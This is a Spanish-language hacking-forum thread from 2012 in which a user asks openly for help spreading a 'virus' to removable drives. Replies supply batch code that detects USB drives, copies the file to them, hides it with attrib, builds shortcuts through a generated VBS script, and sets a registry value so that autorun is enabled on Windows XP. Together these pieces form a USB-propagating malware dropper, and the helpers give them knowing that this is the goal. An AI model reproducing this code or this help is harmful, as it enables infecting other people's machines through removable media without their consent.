elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [BATCH] copiar y ocultar virus en unidades extraibles
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [BATCH] copiar y ocultar virus en unidades extraibles  (Leído 5,886 veces)
imlikeabird34

Desconectado Desconectado

Mensajes: 35


Ver Perfil
[BATCH] copiar y ocultar virus en unidades extraibles
« en: 23 Diciembre 2012, 18:25 pm »

Buenas tardes comunidad, tal y como dice el titulo del tema necesito un comando para copiar un ejecutable SOLO A LAS UNIDADES EXTRAIBLES.
Quizas exista alguna variable de entorno que desconozco.
Tengo este codigo pero tambien copia a unidades del disco duro y solo quiero q se copie en unidades extraibles:
Código:
@echo off
for %%unidad in (e f g h i j k l m n o p q r s t u v w x y z) do (
xcopy %userprofile%\desktop\virus.exe %unidad%: /Y
)
El virus debe estar oculto en una carpeta de la unidad extraible y debe crearse un acceso directo en el mismo.


En línea

Segadorfelix

Desconectado Desconectado

Mensajes: 157



Ver Perfil
Re: [BATCH] copiar y ocultar virus en unidades extraibles
« Respuesta #1 en: 23 Diciembre 2012, 18:31 pm »

mmn Tal vez este post te sirva:
http://foro.elhacker.net/scripting/script_batch_para_infeccion_a_traves_de_unidades_extraibles-t250133.0.html


En línea

imlikeabird34

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Re: [BATCH] copiar y ocultar virus en unidades extraibles
« Respuesta #2 en: 24 Diciembre 2012, 02:50 am »

lei el tema pero no se explica bien que hace cada linea de código ademas si hay mas de un disco extraible el archivo solo se copia a uno.
PD: La ayuda del fsutil es excasa
En línea

Segadorfelix

Desconectado Desconectado

Mensajes: 157



Ver Perfil
Re: [BATCH] copiar y ocultar virus en unidades extraibles
« Respuesta #3 en: 24 Diciembre 2012, 04:51 am »

fsutil necesita derechos administrativos, solo es necesario el comando "fsutil fsinfo drives"; me parece mejor que hagas un "escaneo" de las unidades sin usb(por ejemplo el equipo sin usb escanea C: y D:), tambien que sepa si se ejecuta de una usb o de una unidad. :-\

Otro link con mas informacion
http://foro.elhacker.net/scripting/seleccionar_unidad_y_ejecutar_comando-t332007.0.html
« Última modificación: 24 Diciembre 2012, 05:01 am por Segadorfelix » En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
Re: [BATCH] copiar y ocultar virus en unidades extraibles
« Respuesta #4 en: 24 Diciembre 2012, 07:13 am »

Código
  1. @Echo OFF
  2.  
  3. REM By Elektro H@cker
  4.  
  5. :: Obtenemos las letras de unidades conectadas
  6. For /F "tokens=* delims=Unidades:\ " %%@ in ('fsutil fsinfo drives') Do (
  7. Call Set "Drives=%%@"
  8. Call Set "Drives=%%DRIVES::=%%"
  9. Call Set "Drives=%%DRIVES:\=%%"
  10. Call :isUSB?
  11. REM Listar
  12. Call Echo [Unidades] %%USBs:~1%% | MORE
  13. )
  14.  
  15. :: FIN
  16. Echo Se han procesado todas las unidades. | MORE
  17. Pause&Exit
  18.  
  19. REM Comprueba si la unidad es un dispositivo USB
  20. :isUSB?
  21. For %%X in (%DRIVES%) Do (fsutil fsinfo drivetype %%X:\ | Find /I "extra" >NUL && (Call Set "USBs=%%USBs%% %%X"))
  22. Goto:EOF

> Buscar y Listar archivos con cierta extensión en una computadora



También te puede servir este script:



> [BATCH] [APORTE] USB MON (Roba USB)

Saludos
En línea

imlikeabird34

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Re: [BATCH] copiar y ocultar virus en unidades extraibles
« Respuesta #5 en: 26 Diciembre 2012, 04:53 am »

gracias por tomarse la molestia muchachos, investigando y probando mi script va asi:
Código:
@echo off
for %%a in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f  %%b in ('fsutil fsinfo drivetype %%a: ^| find "extra"') do (
xcopy /Y virus.bat %%b ))
Para finalizar, como hago para ocultar ese archivo dentro de una carpeta de la unidad extraible y como creo un acceso directo en el mismo?
Ademas me gustaria que se abra con el autorun.inf
En línea

Segadorfelix

Desconectado Desconectado

Mensajes: 157



Ver Perfil
Re: [BATCH] copiar y ocultar virus en unidades extraibles
« Respuesta #6 en: 26 Diciembre 2012, 05:17 am »

gracias por tomarse la molestia muchachos, investigando y probando mi script va asi:
Código:
@echo off
for %%a in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f  %%b in ('fsutil fsinfo drivetype %%a: ^| find "extra"') do (
xcopy /Y virus.bat %%b ))
Para finalizar, como hago para ocultar ese archivo dentro de una carpeta de la unidad extraible y como creo un acceso directo en el mismo?
Ademas me gustaria que se abra con el autorun.inf
attrib para ocultar y VBS para crear los .lnk(esta en el tutorial de vbs por nov, en esta misma sección)
El autorun.inf, lo busco mas tarde y modifico el mensaje  :P (si es que alguien no lo hace antes  :xD )
En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
Re: [BATCH] copiar y ocultar virus en unidades extraibles
« Respuesta #7 en: 26 Diciembre 2012, 06:24 am »

Ademas me gustaria que se abra con el autorun.inf
El autorun.inf, lo busco mas tarde

Un autorun.inf para un pendrive es algo del pasado, obsoleto,
si van a utilizar Windows 7/8 es imposible ejecutar un autorun.inf porque Microsoft lo deshabilitó para dispositivos USB por medidas obvias de seguridad (A menos que usen un buen pendrive "camaleón" que se haga pasar por CD-ROM).

EDITO: Para WinXP no hay problema (Siempre que el servicio de reproducción automática esté activado en el equipo)



Código
  1. REM Ocultar un archivo:
  2. Copy "Archivo.ext" "...\Carpeta\"
  3. Attrib +H "...\Carpeta\Archivo.ext"

Código
  1. REM Crear un acceso directo:
  2. (
  3. Echo: set objWSHShell = CreateObject("WScript.Shell"^)
  4. Echo: set objFso      = CreateObject("Scripting.FileSystemObject"^)
  5. Echo: File         = objFso.GetAbsolutePathName(WScript.Arguments.Item(0^)^)
  6. Echo: S_File       = objWSHShell.ExpandEnvironmentStrings(WScript.Arguments.Item(1^)^)
  7. Echo: S_WorkingDir = Left(File, InStrRev(File, "\"^) - 1^)
  8. Echo: set Shortcut = objWSHShell.CreateShortcut(S_File^)
  9. Echo+
  10. Echo: Shortcut.TargetPath       = File
  11. Echo: Shortcut.WorkingDirectory = S_WorkingDir
  12. Echo: Shortcut.Save
  13. )>"%TEMP%\Create_Shortcut.vbs"
  14.  
  15. WScript "%TEMP%\Create_Shortcut.vbs" "Archivo.txt" "C:\Archivo.lnk"


Saludos.
« Última modificación: 26 Diciembre 2012, 06:27 am por EleKtro H@cker » En línea

imlikeabird34

Desconectado Desconectado

Mensajes: 35


Ver Perfil
Re: [BATCH] copiar y ocultar virus en unidades extraibles
« Respuesta #8 en: 27 Diciembre 2012, 04:48 am »

me sirvió ya pude ocultar mi carpeta, tengo 4 preg(disculpen mi ignorancia, estoy dando mis primeros pasos).
1) con que  registro activo el servicio de reproducción automática en xp?
2) de que manera puedo ejecutar un archivo en windows 7 al insertar una unidad USB
3) podrían facilitarme un bat para la creación de accesos directos?
4) como agrego una contraseña a una carpeta o archivo
« Última modificación: 27 Diciembre 2012, 04:52 am por imlikeabird34 » En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.788



Ver Perfil
Re: [BATCH] copiar y ocultar virus en unidades extraibles
« Respuesta #9 en: 27 Diciembre 2012, 08:56 am »

1) con que  registro activo el servicio de reproducción automática en xp?
Código
  1. REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /V "NoDriveTypeAutoRun" /T "REG_DWORD" /D "0x00000091" /F
http://www.askvg.com/how-to-disable-autorun-functionality-in-windows-using-registry-editor/

El servicio de reproducción automática no recuerdo cual es, lo tengo capado en mi windows, búscalo en la lista de servicios de windows (Botón inicio > ejecutar > Services.smc) y luego es tán sencillo como hacer un:
Código
  1. SC START "Nombre del servicio"



2) de que manera puedo ejecutar un archivo en windows 7 al insertar una unidad USB
De ninguna manera, el autorun era lo único, pero como he explicado es algo obsoleto, deshabilitado en pendrives por medidas de seguridad.

PD: Si le pones ganas puedes programar una aplicación que monitorice las uniades extraíbles y ejecutar el programa deseado, pero obviamente deberás ejecutar tu aplicación programada manualmente.



3) podrían facilitarme un bat para la creación de accesos directos?
Arriba te puse un archivo bat que sirve para eso.
Llámalo cono en el ejemplo:
Código
  1. WScript "%TEMP%\Create_Shortcut.vbs" "Archivo.ext" "C:\Archivo.lnk"



4) como agrego una contraseña a una carpeta o archivo

No puedes proteger con contraseña nada usando Batch, lo único que puedes hacer es una chapuza como esto > http://www.howtogeek.com/105633/how-to-create-a-password-protected-folder-without-any-extra-software/

Código
  1. cls
  2. @ECHO OFF
  3. title Folder Private
  4. if EXIST "HTG Locker" goto UNLOCK
  5. if NOT EXIST Private goto MDLOCKER
  6. :CONFIRM
  7. echo Are you sure you want to lock the folder(Y/N)
  8. set/p "cho=>"
  9. if %cho%==Y goto LOCK
  10. if %cho%==y goto LOCK
  11. if %cho%==n goto END
  12. if %cho%==N goto END
  13. echo Invalid choice.
  14. goto CONFIRM
  15. :LOCK
  16. ren Private "HTG Locker"
  17. attrib +h +s "HTG Locker"
  18. echo Folder locked
  19. goto End
  20. :UNLOCK
  21. echo Enter password to unlock folder
  22. set/p "pass=>"
  23. if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
  24. attrib -h -s "HTG Locker"
  25. ren "HTG Locker" Private
  26. echo Folder Unlocked successfully
  27. goto End
  28. :FAIL
  29. echo Invalid password
  30. goto end
  31. :MDLOCKER
  32. md Private
  33. echo Private created successfully
  34. goto End
  35. :End

Saludos
« Última modificación: 27 Diciembre 2012, 09:03 am por EleKtro H@cker » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Source] Infectar unidades extraibles (pendrive), unidades de red, etc... « 1 2 »
Programación Visual Basic
Mad Antrax 11 8,781 Último mensaje 7 Mayo 2007, 04:04 am
por ‭‭‭‭jackl007
(Source) Detectar unidades extraibles USB « 1 2 »
Programación Visual Basic
Kizar 13 20,546 Último mensaje 10 Diciembre 2008, 18:26 pm
por locoedu
Reconocer unidades extraibles
Scripting
Enemy 3 3,434 Último mensaje 30 Octubre 2008, 21:43 pm
por Novlucker
Script batch para infeccion a traves de Unidades Extraibles
Scripting
LauBuru 4 6,387 Último mensaje 30 Marzo 2009, 22:08 pm
por LauBuru
manejar unidades extraibles
Programación C/C++
MessageBoxA 2 3,492 Último mensaje 22 Enero 2011, 13:48 pm
por Oblivi0n
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines